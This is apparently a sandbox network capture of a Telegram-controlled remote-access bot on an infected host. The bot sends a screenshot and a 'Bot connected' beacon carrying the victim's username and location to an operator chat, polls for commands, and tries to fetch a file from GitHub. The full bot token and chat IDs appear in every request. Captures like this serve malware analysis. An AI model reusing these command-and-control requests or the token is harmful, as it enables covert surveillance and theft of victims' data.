{"ok":true,"result":{"message_id":81332,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552615,"document":{"file_name":"screenshot.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQE9tGZfxeflth0l3BocoueEcae5LZSCAALaEQACIhwBU7tdKE8JAY5aAQAHbQADNQQ","file_unique_id":"AQAD2hEAAiIcAVNy","file_size":15885,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQE9tGZfxeflth0l3BocoueEcae5LZSCAALaEQACIhwBU7tdKE8JAY5aAQAHbQADNQQ","file_unique_id":"AQAD2hEAAiIcAVNy","file_size":15885,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEBPbRmX8Xn5bYdJdwaHKLnhHGnuS2UggAC2hEAAiIcAVO7XShPCQGOWjUE","file_unique_id":"AgAD2hEAAiIcAVM","file_size":128680},"caption":"\ud83d\udcf8Screenshot taken"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49764	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:56 UTC	352	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:56:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:56 GMT Content-Type: application/json Content-Length: 480 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:56 UTC	480	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 36 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 61 31 5c 75 66 65 30 66 Data Ascii: {"ok":true,"result":{"message_id":81333,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552616,"text":"\u26a1\ufe0f

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49765	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:57 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:56:57 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:57 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:57 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49768	185.199.109.133	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:59 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-06-05 01:56:59 UTC	802	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC Accept-Ranges: bytes Date: Wed, 05 Jun 2024 01:56:59 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210171-DFW X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1717552620.528511,VS0,VE2 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 0d3e5cea8750e4a4fe24e92cb76efd93e7b15268 Expires: Wed, 05 Jun 2024 02:01:59 GMT Source-Age: 30
2024-06-05 01:56:59 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49767	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:59 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:56:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:59 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:59 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49769	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:01 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:01 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:01 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49770	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:03 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:03 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:04 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49771	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:04 UTC	376	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-06-05 01:57:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:04 GMT Content-Type: application/json Content-Length: 480 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:04 UTC	480	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 32 34 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 61 31 5c 75 66 65 30 66 Data Ascii: {"ok":true,"result":{"message_id":81334,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552624,"text":"\u26a1\ufe0f

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49772	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:05 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:05 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:05 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49773	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:05 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:06 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:06 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49776	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:07 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:07 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:08 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49777	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:08 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:08 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:08 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49779	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:09 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:10 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:10 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49780	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:10 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:10 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:10 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49781	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:12 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
